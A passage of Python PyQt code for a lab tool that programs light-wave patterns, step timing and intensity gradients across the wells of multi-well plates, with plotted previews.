wvType == 'const':\n self.waveTypeCB.setCurrentIndex(0)\n elif wvType == 'sin':\n self.waveTypeCB.setCurrentIndex(1)\n elif wvType == 'tri':\n self.waveTypeCB.setCurrentIndex(2)\n elif wvType == 'sq':\n self.waveTypeCB.setCurrentIndex(3)\n elif wvType == 'pwm':\n self.waveTypeCB.setCurrentIndex(4)\n elif wvType == 'rise':\n self.waveTypeCB.setCurrentIndex(5)\n elif wvType == 'fall':\n self.waveTypeCB.setCurrentIndex(6)\n\n self.wvMax = wellinfo['maxVal']\n self.maxIntensitySB.setValue(self.wvMax)\n self.maxIntensitySlider.setValue(self.wvMax)\n\n if wvType not in {'pwm', 'const'}:\n self.wvMin = wellinfo['minVal']\n self.minIntensitySB.setValue(self.wvMin)\n if wvType not in {'rise', 'fall'}:\n self.wvLen = wellinfo['wvLen']\n self.wavelengthSB.setValue(self.wvLen)\n elif wvType != 'const':\n self.periodPWM = wellinfo['periodPWM']\n self.periodPWMSB.setValue(self.periodPWM)\n self.dutyCyclePWM = wellinfo['dutyCyclePWM']\n self.dutyCycleSB.setValue(int(self.dutyCyclePWM * 100))\n if wvType not in {'rise', 'fall', 'const'}:\n self.wvStart = wellinfo['start']\n self.startAnimationCB.setCurrentText(self.wvStart)\n\n def showWellInformations(self):\n self.wellInfoWin = wellInfoWindow(buttonNr = self.rightClickButtonNr, plateNr = self.plate_nr, plateInfo = self.StepInformations, framerate = self.framerate)\n self.wellInfoWin.closed.connect(self.closeInfo)\n self.wellInfoWin.show()\n def closeInfo(self):\n self.wellInfoWin = None\n\n def changeWavetype(self):\n for row in range(self.ParameterFormlayout.rowCount() - 2):\n self.ParameterFormlayout.removeRow(2)\n\n self.color = self.color_chooser.currentText()\n\n self.maxIntensitySB = QSpinBox()\n self.maxIntensitySB.setMaximum(255)\n self.maxIntensitySB.setMinimum(0)\n self.maxIntensitySB.setValue(self.wvMax)\n self.minIntensitySB = QSpinBox()\n self.minIntensitySB.setMaximum(254)\n self.minIntensitySB.setValue(self.wvMin)\n\n self.maxIntensitySlider = QSlider(Qt.Horizontal)\n self.maxIntensitySlider.setMaximum(255)\n self.maxIntensitySlider.setValue(self.wvMax)\n\n self.maxIntensitySB.valueChanged.connect(lambda ignore: self.maxIntensitySlider.setValue(self.maxIntensitySB.value()))\n self.maxIntensitySB.valueChanged.connect(lambda ignore: self.minIntensitySB.setMaximum(self.maxIntensitySB.value() - 1))\n self.maxIntensitySB.valueChanged.connect(self.updatePlot)\n self.minIntensitySB.valueChanged.connect(lambda ignore: self.maxIntensitySB.setMinimum(self.minIntensitySB.value() + 1))\n self.minIntensitySB.valueChanged.connect(self.updatePlot)\n\n self.maxIntensitySlider.valueChanged.connect(lambda ignore: self.maxIntensitySB.setValue(self.maxIntensitySlider.value()))\n self.maxIntensitySlider.valueChanged.connect(self.updatePlot)\n\n self.wavelengthSB = QSpinBox()\n self.wavelengthSB.setSuffix(' min')\n self.wavelengthSB.setMinimum(1)\n self.wavelengthSB.setValue(self.wvLen)\n self.wavelengthSB.valueChanged.connect(lambda ignore: self.updatePlot())\n\n self.startAnimationCB = QComboBox()\n self.startAnimationCB.addItem('High')\n self.startAnimationCB.addItem('Low')\n self.startAnimationCB.setCurrentText(self.wvStart)\n self.startAnimationCB.currentIndexChanged.connect(lambda ignore: self.updatePlot())\n\n self.dutyCycleSB = QSpinBox()\n self.dutyCycleSB.setSuffix(' %')\n self.dutyCycleSB.setMinimum(0)\n self.dutyCycleSB.setMaximum(100)\n self.dutyCycleSB.setValue(int(self.dutyCyclePWM * 100))\n self.dutyCycleSB.valueChanged.connect(lambda ignore: self.updatePlot())\n\n self.periodPWMSB = QSpinBox()\n self.periodPWMSB.setSuffix(' min')\n self.periodPWMSB.setMinimum(1)\n self.periodPWMSB.setValue(self.periodPWM)\n self.periodPWMSB.valueChanged.connect(lambda ignore: self.updatePlot())\n\n if self.color_chooser.currentIndex() == 0:\n self.waveTypeCB.setDisabled(True)\n else:\n self.pen = pg.mkPen(color=self.color_chooser.currentText().lower(), width=2)\n self.waveTypeCB.setDisabled(False)\n if self.waveTypeCB.currentIndex() in {1, 2, 3, 5, 6}:\n self.ParameterFormlayout.addRow(QLabel('Max. Intensity: '), self.maxIntensitySB)\n elif self.waveTypeCB.currentIndex() in {0, 4}:\n maxIntensityLayout = QHBoxLayout()\n maxIntensityLayout.addWidget(self.maxIntensitySlider)\n maxIntensityLayout.addWidget(self.maxIntensitySB)\n self.ParameterFormlayout.addRow(QLabel('Intensity: '), maxIntensityLayout)\n if self.waveTypeCB.currentIndex() in {1, 2, 3, 5, 6}:\n self.ParameterFormlayout.addRow(QLabel('Mix. Intensity: '), self.minIntensitySB)\n if self.waveTypeCB.currentIndex() in {1, 2, 3}:\n self.ParameterFormlayout.addRow(QLabel('Wavelength: '), self.wavelengthSB)\n if self.waveTypeCB.currentIndex() == 4:\n self.ParameterFormlayout.addRow(QLabel('Off time: '), self.dutyCycleSB)\n if self.waveTypeCB.currentIndex() == 4:\n self.ParameterFormlayout.addRow(QLabel('Period: '), self.periodPWMSB)\n if self.waveTypeCB.currentIndex() in {1, 2, 3, 4}:\n self.ParameterFormlayout.addRow(QLabel('Starting Intensity: '), self.startAnimationCB)\n \n self.showPlotCB = QCheckBox()\n self.showPlotCB.stateChanged.connect(self.showPlot)\n\n self.applyChangesButton = QPushButton('Apply', self)\n self.applyChangesButton.clicked.connect(self.applyParameterChanges)\n self.applyChangesButton.setDefault(True)\n\n self.ParameterFormlayout.addRow(QLabel('Show preview'), self.showPlotCB)\n self.ParameterFormlayout.addRow(QLabel(), self.applyChangesButton)\n\n if self.getSettingsRB.isChecked():\n self.applyChangesButton.setDisabled(True)\n if self.plotPreviewDisplayed:\n self.showPlotCB.setChecked(True)\n\n self.updatePlot()\n\n def updatePlot(self):\n self.wvMax = self.maxIntensitySB.value()\n self.wvMin = self.minIntensitySB.value()\n self.wvStart = self.startAnimationCB.currentText()\n self.wvLen = self.wavelengthSB.value()\n self.dutyCyclePWM = (self.dutyCycleSB.value() / 100)\n self.periodPWM = self.periodPWMSB.value()\n\n try:\n stepLength = self.StepInformations[self.selceted_step][0][0] * 60 + \\\n self.StepInformations[self.selceted_step][0][1] + self.StepInformations[self.selceted_step][0][2] / 60 + self.framerate\n except:\n stepLength = 10\n\n dp_x = []\n dp_y = []\n\n if self.color_chooser.currentIndex() == 0:\n self.graphWidget.removeItem(self.data_line)\n else:\n # Const\n if self.waveTypeCB.currentIndex() == 0:\n dp_x = [0, stepLength - self.framerate]\n dp_y = [self.wvMax, self.wvMax]\n\n # Sine\n elif self.waveTypeCB.currentIndex() == 1:\n a = (self.wvMax - self.wvMin) / 2\n b = 2 * np.pi / self.wvLen\n d = a + self.wvMin\n if self.wvStart == 'Low':\n c = - (self.wvLen/4)\n elif self.wvStart == 'High':\n c = (self.wvLen/4)\n\n time = np.arange(0, stepLength, self.framerate) \n wave = a * np.sin(b * (time + c)) + d\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n\n # Tri\n elif self.waveTypeCB.currentIndex() == 2:\n a = (self.wvMax - self.wvMin) / 2\n d = a + self.wvMin\n if self.wvStart == 'Low':\n c = - (self.wvLen/4)\n elif self.wvStart == 'High':\n c = (self.wvLen/4)\n\n time = np.arange(0, stepLength, self.framerate) \n wave = (4 * a/self.wvLen * abs(((time + c - self.wvLen/4) % self.wvLen) - self.wvLen/2) - a) + d\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n\n # Square / PWM\n elif self.waveTypeCB.currentIndex() in {3, 4}:\n\n TimePeriod = self.periodPWM\n percent = self.dutyCyclePWM\n if self.waveTypeCB.currentIndex() == 3:\n TimePeriod = self.wvLen\n percent = 0.5\n\n time = np.arange(0, stepLength, self.framerate)\n wave = []\n\n if self.wvStart == 'Low':\n pwm = time % TimePeriod < TimePeriod * percent\n for dp in pwm:\n if dp:\n wave.append(0)\n else:\n wave.append(self.wvMax)\n elif self.wvStart == 'High':\n pwm = time % TimePeriod < TimePeriod * percent\n for dp in pwm:\n if dp:\n wave.append(self.wvMax)\n else:\n wave.append(0)\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n \n # Rise\n elif self.waveTypeCB.currentIndex() == 5:\n time = np.arange(0, stepLength, self.framerate)\n wave = []\n\n diff = self.wvMax - self.wvMin\n dp = self.wvMin\n\n for i in range(len(time)):\n wave.append(dp)\n dp += diff/(len(time)-2)\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n \n # Fall\n elif self.waveTypeCB.currentIndex() == 6:\n time = np.arange(0, stepLength, self.framerate)\n wave = []\n\n diff = self.wvMax - self.wvMin\n dp = self.wvMax\n\n for i in range(len(time)):\n wave.append(dp)\n dp -= diff/(len(time)-2)\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n \n self.graphWidget.setLimits(xMin = 0, xMax = stepLength - self.framerate + (stepLength - self.framerate) * 0.05, yMin = -1, yMax = 256, minXRange = 5, minYRange = 25)\n self.graphWidget.setXRange(0, stepLength - self.framerate + (stepLength - self.framerate) * 0.05)\n self.graphWidget.removeItem(self.data_line)\n self.data_line = self.graphWidget.plot(dp_x, dp_y, pen=self.pen)\n\n def showPlot(self, state):\n if (Qt.Checked == state):\n self.graphProgrammStack.setCurrentIndex(1)\n self.plotPreviewDisplayed = True\n self.updatePlot()\n else:\n self.graphProgrammStack.setCurrentIndex(0)\n self.plotPreviewDisplayed = False\n\n def changeSelectionType(self, seltyp):\n if seltyp == 0:\n self.ParameterBox.setDisabled(False)\n self.GradientBox.setDisabled(True)\n self.applyChangesButton.setDisabled(False)\n self.selected_wells = set()\n self.applyParameterChanges()\n\n elif seltyp == 2:\n self.ParameterBox.setDisabled(False)\n self.GradientBox.setDisabled(True)\n self.applyChangesButton.setDisabled(True)\n self.selected_wells = set()\n self.applyParameterChanges()\n\n elif seltyp == 1:\n self.ParameterBox.setDisabled(True)\n self.GradientBox.setDisabled(False)\n self.selected_wells = set()\n self.graphProgrammStack.setCurrentIndex(0)\n self.plotPreviewDisplayed = False\n self.showPlotCB.setChecked(False)\n\n self.applyParameterChanges()\n self.select_wells(1)\n\n def updateDuration_info(self, step_nr):\n self.StepInformations[step_nr][0][0] = self.StepGBoxes[step_nr][4].value()\n self.StepInformations[step_nr][0][1] = self.StepGBoxes[step_nr][5].value()\n self.StepInformations[step_nr][0][2] = self.StepGBoxes[step_nr][6].value()\n\n def updateDuration_SB(self, step_nr):\n self.StepGBoxes[step_nr][4].valueChanged.disconnect()\n self.StepGBoxes[step_nr][5].valueChanged.disconnect()\n self.StepGBoxes[step_nr][6].valueChanged.disconnect()\n self.StepGBoxes[step_nr][4].setValue(self.StepInformations[step_nr][0][0])\n self.StepGBoxes[step_nr][5].setValue(self.StepInformations[step_nr][0][1])\n self.StepGBoxes[step_nr][6].setValue(self.StepInformations[step_nr][0][2])\n self.StepGBoxes[step_nr][4].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][5].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][6].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n\n def addStep(self):\n self.amount_of_steps += 1\n self.addStepBox()\n\n def changeStep(self, step_nr, modify_Step = False):\n # Update Step Information\n selctedPlate = self.plate_nr\n\n if not modify_Step:\n self.StepInformations[self.selceted_step][1] = self.getStepInfo()\n\n # Change Step\n self.selceted_step = step_nr\n\n # Change Style\n for step in self.StepGBoxes:\n self.StepGBoxes[step][1].setStyleSheet(\"\") \n self.StepGBoxes[step_nr][1].setStyleSheet(\n \"QGroupBox{background-color: transparent;\"\n \"border: 1px solid blue;\"\n \"border-radius: 5px;\"\n \"margin-top: 1ex;}\"\n \"QGroupBox:title {subcontrol-position: top left;\"\n \"padding: -14px 0px 0px 3px; color:blue;}\")\n self.CurrentStepGBox.setTitle('Step ' + str(step_nr))\n\n # Load Info\n self.loadStepInfo(self.StepInformations[self.selceted_step][1])\n\n if selctedPlate == 0:\n self.plate_chooser_CB.setCurrentIndex(0)\n elif selctedPlate == 1:\n self.plate_chooser_CB.setCurrentIndex(1)\n\n def deleteStep(self, step_nr):\n\n if self.amount_of_steps > 1:\n stillcontinue = True\n # Are you sure Message Box\n if self.StepInformations[step_nr][1] != {'Plate 1 Wells': {}, 'Plate 1 Type': 96, 'Plate 2 Wells': {}, 'Plate 2 Type': 96}:\n stillcontinue = False\n\n if stillcontinue == False:\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"You already modified Step {}. Do you still want to continue?\".format(step_nr), clear_plate_MessageBox.Yes | clear_plate_MessageBox.No)\n if clear_plate_MessageBox.Yes:\n stillcontinue = True\n else:\n stillcontinue = False\n\n if stillcontinue:\n # Update Changes\n self.StepInformations[self.selceted_step][1] = self.getStepInfo()\n\n # Remove Widget\n for step in range(self.amount_of_steps):\n self.StepGBoxes[step+1][1].deleteLater()\n del self.StepGBoxes[step+1]\n \n new_amount_of_steps = self.amount_of_steps - 1\n self.amount_of_steps = 0\n\n for step in range(new_amount_of_steps):\n self.amount_of_steps += 1\n self.addStepBox(newStep = False)\n\n # Remove Information\n del self.StepInformations[step_nr]\n\n higher_steps = []\n for step in self.StepInformations:\n if step_nr < step:\n higher_steps.append(step)\n\n for step in higher_steps:\n self.StepInformations[step-1] = self.StepInformations.pop(step)\n\n # Update Information\n for step in self.StepInformations:\n self.updateDuration_SB(step)\n\n # Change Step if selected Step deleted\n if step_nr == self.selceted_step:\n if step_nr == self.amount_of_steps + 1:\n self.changeStep(self.selceted_step - 1, modify_Step = True)\n else:\n self.changeStep(self.selceted_step, modify_Step = True)\n elif step_nr < self.selceted_step:\n self.changeStep(self.selceted_step-1, modify_Step = True)\n else:\n self.changeStep(self.selceted_step, modify_Step = True)\n\n def applyParameterChanges(self):\n if self.color_chooser.currentIndex() == 0:\n for selected_well in self.selected_wells:\n if self.plate_nr == 0: \n try:\n del self.used_wells_plate_1[selected_well]\n except KeyError:\n pass\n elif self.plate_nr == 1: \n try:\n del self.used_wells_plate_2[selected_well]\n except KeyError:\n pass\n else:\n if self.color_chooser.currentIndex() == 1:\n button_color = (int(sqrt(self.maxIntensitySB.value()) * 15.99), 0, 0)\n light_button_color = (255, 102, 102)\n elif self.color_chooser.currentIndex() == 2:\n button_color = (0, int(sqrt(self.maxIntensitySB.value()) * 15.99), 0)\n light_button_color = (102, 255, 102)\n elif self.color_chooser.currentIndex() == 3:\n button_color = (0, 0, int(sqrt(self.maxIntensitySB.value()) * 15.99))\n light_button_color = (153, 204, 255)\n \n for selected_well in self.selected_wells:\n if self.waveTypeCB.currentIndex() == 0:\n wellInformation= {\n 'waveType': 'const',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'position': None,\n 'button_color': button_color,\n 'Icon': None}\n elif self.waveTypeCB.currentIndex() == 1:\n wellInformation= {\n 'waveType': 'sin',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'minVal': self.minIntensitySB.value(),\n 'wvLen': self.wavelengthSB.value(),\n 'start': self.startAnimationCB.currentText(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-sin.svg')}\n elif self.waveTypeCB.currentIndex() == 2:\n wellInformation= {\n 'waveType': 'tri',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'minVal': self.minIntensitySB.value(),\n 'wvLen': self.wavelengthSB.value(),\n 'start': self.startAnimationCB.currentText(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-tri.svg')}\n elif self.waveTypeCB.currentIndex() == 3:\n wellInformation= {\n 'waveType': 'sq',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'minVal': self.minIntensitySB.value(),\n 'wvLen': self.wavelengthSB.value(),\n 'start': self.startAnimationCB.currentText(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-sq.svg')}\n elif self.waveTypeCB.currentIndex() == 4:\n wellInformation= {\n 'waveType': 'pwm',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'dutyCyclePWM': self.dutyCycleSB.value() / 100,\n 'periodPWM': self.periodPWMSB.value(),\n 'start': self.startAnimationCB.currentText(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-blink.svg')}\n elif self.waveTypeCB.currentIndex() == 5:\n wellInformation= {\n 'waveType': 'rise',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'minVal': self.minIntensitySB.value(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-rise.svg')}\n elif self.waveTypeCB.currentIndex() == 6:\n wellInformation= {\n 'waveType': 'fall',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'minVal': self.minIntensitySB.value(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-fall.svg')}\n\n\n if self.plate_nr == 0: \n wellInformation['position'] = (0,) + self.Button_to_pos[selected_well]\n self.used_wells_plate_1[selected_well] = wellInformation\n elif self.plate_nr == 1: \n wellInformation['position'] = (1,) + self.Button_to_pos[selected_well]\n self.used_wells_plate_2[selected_well] = wellInformation\n\n self.selected_wells = set()\n self.StepInformations[self.selceted_step][1] = self.getStepInfo()\n self.changeButtonColor()\n\n def createGradient(self):\n\n '''Creating list of RGB values for Gradient'''\n\n gradient_values = []\n gradient_color_values = []\n upper_level, lower_level = round(self.max_gradient.value()), round(self.min_gradient.value())\n\n if self.direction_chooser_gradient.currentIndex() in {0, 1}:\n gradient_step = (upper_level - lower_level) / (self.height_gradient.value() - 1)\n gradient_values = [round(lower_level + (gradient_step * x)) for x in range(self.height_gradient.value())]\n else:\n gradient_step = (upper_level - lower_level) / (self.width_gradient.value() - 1)\n gradient_values = [round(lower_level + (gradient_step * x)) for x in range(self.width_gradient.value())] \n\n if self.color_chooser_gradient.currentIndex() == 0:\n for i in range(len(gradient_values)):\n gradient_color_values.append((gradient_values[i],0, 0))\n elif self.color_chooser_gradient.currentIndex() == 1:\n for i in range(len(gradient_values)):\n gradient_color_values.append((0, gradient_values[i], 0))\n elif self.color_chooser_gradient.currentIndex() == 2:\n for i in range(len(gradient_values)):\n gradient_color_values.append((0 ,0, gradient_values[i]))\n\n '''Creating grandient with positions'''\n\n self.gradientMatrix = []\n\n if self.direction_chooser_gradient.currentIndex() in {0, 1}:\n for y in range(self.height_gradient.value()):\n y_pos = y + self.PosTL[0]\n for x in range(self.width_gradient.value()):\n x_pos = x + self.PosTL[1]\n if self.direction_chooser_gradient.currentIndex() == 0:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[-(y+1)])))\n elif self.direction_chooser_gradient.currentIndex() == 1:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[y])))\n else:\n for y in range(self.height_gradient.value()):\n y_pos = y + self.PosTL[0]\n for x in range(self.width_gradient.value()):\n x_pos = x + self.PosTL[1]\n if self.direction_chooser_gradient.currentIndex() == 2:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[-(x+1)])))\n elif self.direction_chooser_gradient.currentIndex() == 3:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[x])))\n\n ''' Gradient to enlighted wells'''\n\n if self.plate_nr == 0:\n gradient_wells_plate_1 = {}\n for well in self.gradientMatrix:\n if well[1][0] != 0:\n button_color = (int(sqrt(well[1][0]) * 15.99), 0, 0)\n elif well[1][1] != 0:\n button_color = (0, int(sqrt(well[1][1]) * 15.99), 0)\n elif well[1][2] != 0:\n button_color = (0, 0, int(sqrt(well[1][2]) * 15.99))\n else:\n button_color = (0, 0, 0)\n gradient_wells_plate_1[self.Pos_to_Button[well[0]]] = {\\\n 'waveType': 'const',\\\n 'color': self.color_chooser_gradient.currentText(),\\\n 'maxVal': max(well[1]),\\\n 'position': (0, well[0][0], well[0][1]),\n 'button_color': button_color,\n 'Icon': None}\n elif self.plate_nr == 1:\n gradient_wells_plate_2 = {}\n for well in self.gradientMatrix:\n if well[1][0] != 0:\n button_color = (int(sqrt(well[1][0]) * 15.99), 0, 0)\n elif well[1][1] != 0:\n button_color = (0, int(sqrt(well[1][1]) * 15.99), 0)\n elif well[1][2] != 0:\n button_color = (0, 0, int(sqrt(well[1][2]) * 15.99))\n gradient_wells_plate_2[self.Pos_to_Button[well[0]]] = {\\\n 'waveType': 'const',\\\n 'color': self.color_chooser_gradient.currentText(),\\\n 'maxVal': max(well[1]),\\\n 'position': (1, well[0][0], well[0][1]),\n 'button_color': button_color,\n 'Icon': None}\n\n if (self.plate_nr == 0 and bool(gradient_wells_plate_1.keys() & self.used_wells_plate_1.keys()))\\\n or (self.plate_nr == 1 and bool(gradient_wells_plate_2.keys() & self.used_wells_plate_2.keys())):\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"Some wells in the gradient area are already illuminated. Do you still want to continue?\", clear_plate_MessageBox.Yes | clear_plate_MessageBox.No)\n if clear_plate == clear_plate_MessageBox.Yes:\n if self.plate_nr == 0:\n self.used_wells_plate_1.update(gradient_wells_plate_1)\n elif self.plate_nr == 1:\n self.used_wells_plate_2.update(gradient_wells_plate_2)\n else:\n if self.plate_nr == 0:\n self.used_wells_plate_1.update(gradient_wells_plate_1)\n elif self.plate_nr == 1:\n self.used_wells_plate_2.update(gradient_wells_plate_2)\n\n self.selected_wells = set() \n self.changeButtonColor()\n\n def select_row(self, row_nr):\n if self.selectWellsRB.isChecked():\n buttons_that_row = set()\n for pos, well in self.Pos_to_Button.items():\n if pos[0] == row_nr - 1:\n buttons_that_row.add(well)\n if buttons_that_row.issubset(self.selected_wells) or not bool(buttons_that_row & self.selected_wells):\n for well in buttons_that_row:\n self.select_well(well)\n else:\n for well in buttons_that_row:\n if well in self.selected_wells:\n self.selected_wells.remove(well)\n self.select_well(well)\n else: \n pass\n\n def select_col(self, col_nr):\n if self.selectWellsRB.isChecked():\n buttons_that_col = set()\n for pos, well in self.Pos_to_Button.items():\n if pos[1] == col_nr - 1:\n buttons_that_col.add(well)\n if buttons_that_col.issubset(self.selected_wells) or not bool(buttons_that_col & self.selected_wells):\n for well in buttons_that_col:\n self.select_well(well)\n else:\n for well in buttons_that_col:\n if well in self.selected_wells:\n self.selected_wells.remove(well)\n self.select_well(well)\n else:\n pass\n\n def select_all(self):\n if self.selectWellsRB.isChecked():\n if len(self.selected_wells) != self.plate_type and len(self.selected_wells) != 0:\n self.selected_wells = set()\n for i in range(len(self.Button_to_pos)):\n self.select_well(i+1)\n else:\n pass\n\n def select_wells(self, button_nr):\n if self.selectWellsRB.isChecked():\n self.select_well(button_nr)\n elif self.getSettingsRB.isChecked():\n self.getWellSettings(button_nr = button_nr)\n elif self.createGradientRB.isChecked():\n self.ButtonNrTL = button_nr\n self.PosTL = self.Button_to_pos['Button_{}'.format(button_nr)]\n self.width_gradient.setMaximum(self.plate_width - self.PosTL[1])\n self.height_gradient.setMaximum(self.plate_height - self.PosTL[0])\n if self.PosTL[0] + self.height_gradient.value() <= self.plate_height and\\\n self.PosTL[1] + self.width_gradient.value() <= self.plate_width:\n self.selected_wells = set()\n self.applyParameterChanges()\n for y in range(self.height_gradient.value()):\n for x in range(self.width_gradient.value()):\n button_to_select = self.Pos_to_Button[(self.PosTL[0]+y, self.PosTL[1]+x)]\n self.select_well(int(button_to_select.strip('Button_')))\n\n def select_well(self, button_nr):\n if isinstance(button_nr, str):\n button_to_select = button_nr\n else:\n button_to_select = 'Button_{}'.format(button_nr)\n\n if button_to_select in self.selected_wells:\n self.selected_wells.remove(button_to_select)\n if self.plate_nr == 0 and button_to_select in self.used_wells_plate_1:\n button_color = self.used_wells_plate_1[button_to_select]['button_color']\n self.well_buttons[button_to_select].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\\\n background-color: rgb({red}, {green}, {blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0],\\\n green = button_color[1], blue = button_color[2]))\n self.well_buttons[button_to_select].setIcon(QIcon(self.used_wells_plate_1[button_to_select]['Icon']))\n\n elif self.plate_nr == 1 and button_to_select in self.used_wells_plate_2:\n button_color = self.used_wells_plate_2[button_to_select]['button_color']\n self.well_buttons[button_to_select].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\\\n background-color: rgb({red}, {green}, {blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0],\\\n green = button_color[1], blue = button_color[2]))\n self.well_buttons[button_to_select].setIcon(QIcon(self.used_wells_plate_2[button_to_select]['Icon']))\n else:\n self.well_buttons[button_to_select].setStyleSheet(\"border-radius : {radius}; border: 1px solid black\".\\\n format(radius = self.well_button_radius))\n self.well_buttons[button_to_select].setIcon(QIcon())\n\n else:\n self.selected_wells.add(button_to_select)\n self.well_buttons[button_to_select].setStyleSheet(\"border-radius : {radius}; border: 1px solid black; background-color: #f696ff\".\\\n format(radius = self.well_button_radius))\n self.well_buttons[button_to_select].setIcon(QIcon())\n\n def changePlate(self):\n if self.plate_chooser_CB.currentIndex() != 2:\n self.plate_nr = self.plate_chooser_CB.currentIndex()\n else:\n self.plate_nr = 0\n self.selected_wells = set()\n self.graphProgrammStack.setCurrentIndex(0)\n self.plotPreviewDisplayed = False\n self.showPlotCB.setChecked(False)\n\n if self.plate_nr_type[0] != self.plate_nr_type[1]:\n self.plate_type = self.plate_nr_type[self.plate_nr]\n\n self.reset(self.plate_type, full_step_reset = False)\n self.wellButtonBox.deleteLater()\n self.createwellButtonBox()\n\n Preview_select_Layout = QVBoxLayout()\n Preview_select_Layout.addStretch()\n Preview_select_Layout.addWidget(self.wellButtonBox)\n Preview_select_Layout.addStretch()\n\n self.CurrentStepGBox_Layout.addLayout(Preview_select_Layout)\n\n self.plate_type_CB.blockSignals(True)\n if self.plate_type == 96:\n self.plate_type_CB.setCurrentIndex(0)\n elif self.plate_type == 24:\n self.plate_type_CB.setCurrentIndex(1)\n elif self.plate_type == 6:\n self.plate_type_CB.setCurrentIndex(2)\n self.plate_type_CB.blockSignals(False)\n else:\n self.reset(self.plate_type, full_step_reset = False)\n\n self.changeButtonColor()\n\n def changePlateType(self):\n changePlate = None\n plateEmtpy = False\n oldPlateType = self.plate_type\n newPlateType = None\n\n if self.plate_type_CB.currentIndex() == 0:\n newPlateType = 96\n elif self.plate_type_CB.currentIndex() == 1:\n newPlateType = 24\n elif self.plate_type_CB.currentIndex() == 2:\n newPlateType = 6\n elif self.plate_type_CB.currentIndex() == 3:\n newPlateType = 0\n\n if oldPlateType == newPlateType:\n return\n\n self.graphProgrammStack.setCurrentIndex(0)\n self.plotPreviewDisplayed = False\n self.showPlotCB.setChecked(False)\n\n for step in self.StepInformations:\n if self.plate_nr == 0:\n if self.StepInformations[step][1]['Plate 1 Wells'] == {}:\n plateEmtpy = True\n elif self.plate_nr == 1:\n if self.StepInformations[step][1]['Plate 2 Wells'] == {}:\n plateEmtpy = True\n\n if not plateEmtpy:\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"When you change the plate type, all wells already created on this Plate are reset. Do you still want to continue?\", clear_plate_MessageBox.Yes | 